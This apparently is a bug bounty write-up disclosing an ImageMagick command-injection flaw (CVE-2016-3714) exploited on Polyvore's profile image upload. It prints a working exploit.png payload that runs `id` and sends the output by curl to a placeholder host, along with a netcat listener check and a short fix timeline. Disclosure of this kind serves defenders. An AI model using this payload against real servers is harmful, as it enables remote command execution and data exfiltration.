Exploiting ImageMagick to get RCE on Polyvore (Yahoo Acquisition)
On 5/5/2016 ImageMagick was assigned CVE-2016-3714 “ImageMagick Delegate Arbitrary Command Execution”. Now let’s dig to this vulnerability and how to exploit this. Having ImageMagick locally installed is advised in order to validate the POC (but not required). For this particular report, I created a file named exploit.png with the following in the “source code” to get the target’s `id`:
$ cat exploit.png push graphic-context viewbox 0 0 640 480 image over 0,0 0,0 'https://127.0.0.1/x.php?x=`id | curl http://SOMEIPADDRESS:8080/ -d @- > /dev/null`' pop graphic-contextNow quick check with ImageMagick to make sure our POC is working we'll have nc listening on 8080 and convert x.png to a test file :
$ convert x.png test.png % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 347 0 0 100 347 0 37 0:00:09 0:00:09 --:--:-- 0 [...]
Alright! We got a working POC. Now let's try and find target for this and talk about Yahoo! The process should be pretty easy, find an image uploader (i.e. profile images) and upload the exploit.png file and see what happens. Lucky for me, Polyvore was recently acquired and added to the Yahoo Bug Bounty scope where I remember there was an profile image function from previous testing. Uploading a exploit.png onto Polyvore as my profile image resulted in:
Timeline:
5/4/2016 14:15 - Vulnerability Discovered
5/4/2016 14:35 - Triaged
5/4/2016 15:50 - Fixed